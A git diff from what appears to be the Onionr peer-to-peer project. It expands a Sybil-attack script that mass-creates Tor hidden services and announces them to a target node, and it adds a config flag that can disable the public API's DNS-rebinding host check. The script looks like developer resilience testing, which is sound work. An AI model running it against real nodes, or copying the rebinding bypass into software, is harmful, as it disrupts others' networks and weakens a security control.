diff --git a/scripts/sybil-attack.py b/scripts/sybil-attack.py index a81af097..0914f311 100644 --- a/scripts/sybil-attack.py +++ b/scripts/sybil-attack.py @@ -15,12 +15,26 @@ onionr_port = int(input("Enter onionr public api port: ")) controller = Controller.from_port('127.0.0.1', int(input("Enter tor controller port: "))) controller.authenticate() -for i in range(10): - response = controller.create_ephemeral_hidden_service({80: f'{onionr_ip}:{onionr_port}'}, await_publication=True) - print(response.service_id) - - -node = input("Enter node to attack. Note that you legally must use your own, and even that might lead to technical or legal issues") +node = input("Enter node to attack. Note that you legally must use your own, and even that might lead to technical or legal issues: ") assert stringvalidators.validate_transport(node) +socks = input("Socks:") + +adders = set([]) +for i in range(int(input("Sybil addresses: "))): + response = controller.create_ephemeral_hidden_service({80: f'{onionr_ip}:{onionr_port}'}, await_publication=True) + #print(i, response.service_id) + adders.add(response.service_id) + + +for x in adders: + x += '.onion' + print(f"Introducing {x} to {node}") + basicrequests.do_post_request( + f'http://{node}/announce', + data = {'node': x}, + port=socks) + + + diff --git a/src/httpapi/security/public.py b/src/httpapi/security/public.py index eaddf029..aa63bba7 100644 --- a/src/httpapi/security/public.py +++ b/src/httpapi/security/public.py @@ -40,7 +40,9 @@ class PublicAPISecurity: if request.host not in transports: # Abort conn if wrong HTTP hostname, to prevent DNS rebinding - abort(403) + if not public_api.config.get( + 'general.allow_public_api_dns_rebinding', False): + abort(403) public_api.hitCount += 1 # raise hit count for valid requests try: if 'onionr' in request.headers['User-Agent'].lower():